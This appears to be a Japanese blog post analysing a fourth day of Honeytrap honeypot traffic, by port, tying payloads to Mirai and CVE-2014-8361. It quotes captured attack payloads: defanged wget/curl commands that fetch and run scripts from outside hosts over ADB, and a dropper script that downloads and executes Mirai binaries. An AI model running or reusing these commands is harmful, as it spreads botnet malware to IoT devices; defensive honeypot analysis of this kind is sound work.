ハニーポット分析 4日目です。
本日は、時間があまり取れないため、Honeytrapのみの分析となります。

1. Honeytrap 検知数 6528
<宛先ポート別 TOP10> 

9960ポート：
SSHでアクセス出来るかの調査行為であり、脆弱性を狙った攻撃ではありませんでした。
<検知ペイロード>
SSH-2.0-libssh2_1.4.3

52869 ポート：
CVE-2014-8361 の脆弱性を狙ったものであり、前日同様にMirai関連のマルウェアでした（ファイルダウンロード先の変更なし）

<攻撃パケット>
POST /picsdesc.xml
wget http[:]//212[.]237[.]32[.]xx/mips -O am

POST /wanipcn.xml
wget http[:]//212[.]237[.]32[.]xx -O am

5555ポート：
検知したペイロードは以下であり、をダウンロードしようと試みるものでした。
①
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→以下のファイルをダウンロード

#!/bin/sh
n="arm7 arm5 arm mips mpsl x86 x64 i686"
http_server="207[.]148[.]78[.]xxx"

cd /data/local/tmp

for i in $n
do
cp /system/bin/sh z
>z
wget http://$http_server/qtx.$i -O- > z
chmod 777 z
./z $i
done
→通信先をVirusTotalで調査したところ、Mirai関連のマルウェアでした。

②
shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget http[:]//185[.]162[.]130[.]xxx/adbs -O -> adbs; sh adbs; curl http[:]//185[.]162[.]130[.]xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2
→該当のURLへのアクセス不可
　断定は出来ないですが、おそらくMirai関連だと思います。

<送信元IP別 TOP10> 

IoT製品を狙った攻撃はIPを分散させる傾向にあるため、TOP10にはランクインするケースは少ないように感じます。
攻撃ポートが複数ポートと書いてあるものはポートスキャンとなっています。

ペイロードサイズが 0byteのものはあまり見ても面白くないので、次回以降は除外しようと思います。

以上、4日目の分析でした。